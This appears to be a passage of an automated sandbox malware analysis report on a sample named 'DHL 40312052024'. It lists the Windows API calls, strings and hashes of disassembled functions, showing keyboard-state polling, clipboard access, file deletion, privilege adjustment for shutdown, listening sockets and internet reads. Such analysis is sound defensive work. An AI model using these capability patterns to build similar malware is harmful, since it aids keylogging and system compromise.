                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 3c|$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_|
                                                                                    • API String ID: 0-108275193
                                                                                    • Opcode ID: cde0a6d416e7106dd70bdcec84be647a86dc855d8ad51b5956ffea2c8b558b98
                                                                                    • Instruction ID: 094521341725c5b6d4952d30e46d22c61dc34cf57e018c8dd9d5fae27a8ef214
                                                                                    • Opcode Fuzzy Hash: cde0a6d416e7106dd70bdcec84be647a86dc855d8ad51b5956ffea2c8b558b98
                                                                                    • Instruction Fuzzy Hash: E2724E75E00219DBDF64CF58C884BAEB7B5FF44720F14816EE949EB291EB349981CB90
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 00810097
                                                                                    • SetKeyboardState.USER32(?), ref: 00810102
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00810122
                                                                                    • GetKeyState.USER32(000000A0), ref: 00810139
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00810168
                                                                                    • GetKeyState.USER32(000000A1), ref: 00810179
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 008101A5
                                                                                    • GetKeyState.USER32(00000011), ref: 008101B3
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 008101DC
                                                                                    • GetKeyState.USER32(00000012), ref: 008101EA
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00810213
                                                                                    • GetKeyState.USER32(0000005B), ref: 00810221
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: e6a4b8515a922ce6952feb30eaaf66c8c962aeaf0b6e466bcf359ab3af970f91
                                                                                    • Instruction ID: aede9029da5a0ad384faee51b54d3b6103b651792bc10b17842f9e5209ff2c4e
                                                                                    • Opcode Fuzzy Hash: e6a4b8515a922ce6952feb30eaaf66c8c962aeaf0b6e466bcf359ab3af970f91
                                                                                    • Instruction Fuzzy Hash: 2451B92090478869FB35D7648C547EABFB8FF01380F08459995C2DA5C3DAE89ACCCF62
                                                                                    APIs
                                                                                      • Part of subcall function 00830E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0082FDAD,?,?), ref: 00830E31
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008304AC
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0083054B
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008305E3
                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00830822
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0083082F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1240663315-0
                                                                                    • Opcode ID: 41ceaccd4cf911bb62ee338e51e14f1175beddd936c57c8320fb3f487d92b6e2
                                                                                    • Instruction ID: 7af06f6bbda90803baf130523ed6a3e55606b6267cd423993c183cde01bc93c1
                                                                                    • Opcode Fuzzy Hash: 41ceaccd4cf911bb62ee338e51e14f1175beddd936c57c8320fb3f487d92b6e2
                                                                                    • Instruction Fuzzy Hash: 18E13C31604204EFCB14DF28C895E6ABBE5FF89314F04896DF95ADB262DA34E901CF91
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1737998785-0
                                                                                    • Opcode ID: 462ea4f05ef55111416b0cc96276102f6c57e3c3b81373d7f0261018eff7bec7
                                                                                    • Instruction ID: 119e149cd9d2dbddab09694e7a8ea2071466207b3532426a36178979089b3dc3
                                                                                    • Opcode Fuzzy Hash: 462ea4f05ef55111416b0cc96276102f6c57e3c3b81373d7f0261018eff7bec7
                                                                                    • Instruction Fuzzy Hash: 32219F35600214DFDB10AF24EC09B6A7BA8FF55710F10842AFA46DB2B2DB74AC51CB95
                                                                                    APIs
                                                                                      • Part of subcall function 007B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B4743,?,?,007B37AE,?), ref: 007B4770
                                                                                      • Part of subcall function 00814A31: GetFileAttributesW.KERNEL32(?,0081370B), ref: 00814A32
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 008138A3
                                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0081394B
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0081395E
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0081397B
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0081399D
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008139B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 4002782344-1173974218
                                                                                    • Opcode ID: 96e02d014fde1e447b03338f9e54e27e7f601e0228203c5efdf56490ff4dfc48
                                                                                    • Instruction ID: c2db151b5bf95f07fc72b484b1a44f60664e454c0f51a2f2b880ad53e30292b8
                                                                                    • Opcode Fuzzy Hash: 96e02d014fde1e447b03338f9e54e27e7f601e0228203c5efdf56490ff4dfc48
                                                                                    • Instruction Fuzzy Hash: 3D519B3180414CEACF05EBA0CA96AEDBB78FF51300F604069E402B7192EF356F49CBA1
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0081F440
                                                                                    • Sleep.KERNEL32(0000000A), ref: 0081F470
                                                                                    • _wcscmp.LIBCMT ref: 0081F484
                                                                                    • _wcscmp.LIBCMT ref: 0081F49F
                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 0081F53D
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F553
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                    • String ID: *.*
                                                                                    • API String ID: 713712311-438819550
                                                                                    • Opcode ID: 79c9fe72d587129da8d4acfd6b8a51b0223e87e0064e9a2a03f7f9794446dfea
                                                                                    • Instruction ID: 3d117c58e288a187293b813cc6e8475413093b1e5efe834cd0d3988268c0346c
                                                                                    • Opcode Fuzzy Hash: 79c9fe72d587129da8d4acfd6b8a51b0223e87e0064e9a2a03f7f9794446dfea
                                                                                    • Instruction Fuzzy Hash: 13417C7190021ADFDF14EF64DC49AEEBBB8FF04310F144566E915E32A2EB349A85CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf
                                                                                    • String ID: 3c|$_|
                                                                                    • API String ID: 674341424-1588047251
                                                                                    • Opcode ID: e3f0b90baae9ec50f5b1b14c049647d87a432e5b1f44bf631859f985bba7dbaa
                                                                                    • Instruction ID: 07fe2c71a6928619d332ffd94c629c3ba4db2471e78c51dd5b7a96e085cc5fa4
                                                                                    • Opcode Fuzzy Hash: e3f0b90baae9ec50f5b1b14c049647d87a432e5b1f44bf631859f985bba7dbaa
                                                                                    • Instruction Fuzzy Hash: FF228A71608340DFD724DF24C885BAAB7E4BF84710F04891DFA9A97391DB39EA04CB92
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 8629089cf564949693fcba03fe8f0ee4c24b1cc81248011424479f870f5dfa93
                                                                                    • Instruction ID: 3a7f33eaf809be077d1bba612719c4756079318bf3fc8b46b985cbef878d031d
                                                                                    • Opcode Fuzzy Hash: 8629089cf564949693fcba03fe8f0ee4c24b1cc81248011424479f870f5dfa93
                                                                                    • Instruction Fuzzy Hash: D0126770A00609DBDF04DFA5D986BEEB7B5FF48300F10856DE846E7290EB3AA951CB51
                                                                                    APIs
                                                                                      • Part of subcall function 007B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B4743,?,?,007B37AE,?), ref: 007B4770
                                                                                      • Part of subcall function 00814A31: GetFileAttributesW.KERNEL32(?,0081370B), ref: 00814A32
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00813B89
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00813BD9
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00813BEA
                                                                                    • FindClose.KERNEL32(00000000), ref: 00813C01
                                                                                    • FindClose.KERNEL32(00000000), ref: 00813C0A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2649000838-1173974218
                                                                                    • Opcode ID: f4a2bbb3d72421892eb56d108281fdab063da3d918084693af42ee206fa2f108
                                                                                    • Instruction ID: b084fed8688e2212173ac06027c2ea1693057e77d67153665d8fae972cd46944
                                                                                    • Opcode Fuzzy Hash: f4a2bbb3d72421892eb56d108281fdab063da3d918084693af42ee206fa2f108
                                                                                    • Instruction Fuzzy Hash: 9B316B71008385DBC305EB24D8999EFBBACBE91314F444E2DF4D592192EB25DA08CBA3
                                                                                    APIs
                                                                                      • Part of subcall function 008087E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0080882B
                                                                                      • Part of subcall function 008087E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00808858
                                                                                      • Part of subcall function 008087E1: GetLastError.KERNEL32 ref: 00808865
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 008151F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                    • API String ID: 2234035333-194228
                                                                                    • Opcode ID: 93e26bb29598be5ab0b53673c07bbc6edb92688ab5963704ac8076bfe468ec3f
                                                                                    • Instruction ID: 076d58e7401339bba8b70561bf0c0ba6aabb06dc9b41baacd2e5b47bf06ef598
                                                                                    • Opcode Fuzzy Hash: 93e26bb29598be5ab0b53673c07bbc6edb92688ab5963704ac8076bfe468ec3f
                                                                                    • Instruction Fuzzy Hash: C001F732B91615EBE76862689C9AFFB725CFF89744F200821F957E20D2DA711CC08590
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008262DC
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 008262EB
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00826307
                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00826316
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00826330
                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00826344
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                    • String ID:
                                                                                    • API String ID: 1279440585-0
                                                                                    • Opcode ID: e9ec3cb35a2ea6509c7e927869e5de8ce137bf0af1e3229b2b0463270829004d
                                                                                    • Instruction ID: 72aab4e0b6104105f0fd051adc510ba3cfa1cc1333bd2fd80efdbb55715052d2
                                                                                    • Opcode Fuzzy Hash: e9ec3cb35a2ea6509c7e927869e5de8ce137bf0af1e3229b2b0463270829004d
                                                                                    • Instruction Fuzzy Hash: BF21CE30600214AFCB10EF68DC49B6EB7B9FF89720F144569EA26E7392D770AC51CB91
                                                                                    APIs
                                                                                      • Part of subcall function 007D0DB6: std::exception::exception.LIBCMT ref: 007D0DEC
                                                                                      • Part of subcall function 007D0DB6: __CxxThrowException@8.LIBCMT ref: 007D0E01
                                                                                    • _memmove.LIBCMT ref: 00800258
                                                                                    • _memmove.LIBCMT ref: 0080036D
                                                                                    • _memmove.LIBCMT ref: 00800414
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1300846289-0
                                                                                    • Opcode ID: 0e4b82b486727c5f7f4317cb2e7ca60e554f570991f933dd42f9eac5b92541a2
                                                                                    • Instruction ID: 7ce38215cc96fcd0ee07bdd61e29fe24aace17fd367841775ec452955d80c0e3
                                                                                    • Opcode Fuzzy Hash: 0e4b82b486727c5f7f4317cb2e7ca60e554f570991f933dd42f9eac5b92541a2
                                                                                    • Instruction Fuzzy Hash: A7026DB0A00209DBCF44DF64D985BAE7BB5FF44300F558069E806DB395EB39E950CB95
APIs
  • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 007B19FA
• GetSysColor.USER32(0000000F), ref: 007B1A4E
• SetBkColor.GDI32(?,00000000), ref: 007B1A61
  • Part of subcall function 007B1290: DefDlgProcW.USER32(?,00000020,?), ref: 007B12D8
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0081BCE6
• _wcscmp.LIBCMT ref: 0081BD16
• _wcscmp.LIBCMT ref: 0081BD2B
• FindNextFileW.KERNEL32(00000000,?), ref: 0081BD3C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0081BD6C
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
APIs
  • Part of subcall function 00827D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00827DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0082679E
• WSAGetLastError.WSOCK32(00000000), ref: 008267C7
• bind.WSOCK32(00000000,?,00000010), ref: 00826800
• WSAGetLastError.WSOCK32(00000000), ref: 0082680D
• closesocket.WSOCK32(00000000,00000000), ref: 00826821
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008080C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008080CA
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008080D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008080E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008080F6
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• CoInitialize.OLE32(00000000), ref: 0081C432
• CoCreateInstance.OLE32(00842D6C,00000000,00000001,00842BDC,?), ref: 0081C44A
  • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
• CoUninitialize.OLE32 ref: 0081C6B7
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,007B4AD0), ref: 007B4B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007B4B57
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0082EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 0082EE4B
  • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
• Process32NextW.KERNEL32(00000000,?), ref: 0082EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0082EF1A
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 0080E628
Strings
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0082180A,00000000), ref: 008223E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00822418
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
                                                                                    • Opcode ID: 102965a15df51a1ddd62da1a4df28121dea5628af8664b7af63477355faae416
                                                                                    • Instruction ID: 09142f11b567a9c3fae1d9e037c28a0c4ae8079bf5661f1670686a9e3be529d4
                                                                                    • Instruction Fuzzy Hash: 5F41E871904219FFEB10EE95EC89FBB77BCFB40318F10406EF601E6251DA759E819654
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0081B40B
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0081B465
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0081B4B2
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                    • String ID:
                                                                                    • API String ID: 1682464887-0
                                                                                    • Opcode ID: dfcdc1e554aa570503a6bc4399a0606270c0be6eb18a16341d5e13f2d9201a7e
                                                                                    • Instruction ID: e4ad1191314ce27989dc08c8640615f8b358021b3671d32b923c6d05dcdb3c10
                                                                                    • Instruction Fuzzy Hash: 37214175A00108EFCB00EFA5D885EEDBBB8FF49314F1480A9E905EB362DB319955CB55
                                                                                    APIs
                                                                                      • Part of subcall function 007D0DB6: std::exception::exception.LIBCMT ref: 007D0DEC
                                                                                      • Part of subcall function 007D0DB6: __CxxThrowException@8.LIBCMT ref: 007D0E01
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0080882B
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00808858
                                                                                    • GetLastError.KERNEL32 ref: 00808865
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1922334811-0
                                                                                    • Opcode ID: 8648bdf93906aded32ce0490c4c1f6e0486c00961523c3a10dc3983dcefe4877
                                                                                    • Instruction ID: c08c78a8c9ed24dcc6a735c4d04f9ebb587802b027444b57fb6ba92f94781780
                                                                                    • Instruction Fuzzy Hash: A9116DB2914204EFE718DFA4DC85D6BB7B9FB44710B20852EE49597351EB30AC408BA0
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00808774
                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0080878B
                                                                                    • FreeSid.ADVAPI32(?), ref: 0080879B
                                                                                    Similarity
                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                    • String ID:
                                                                                    • API String ID: 3429775523-0
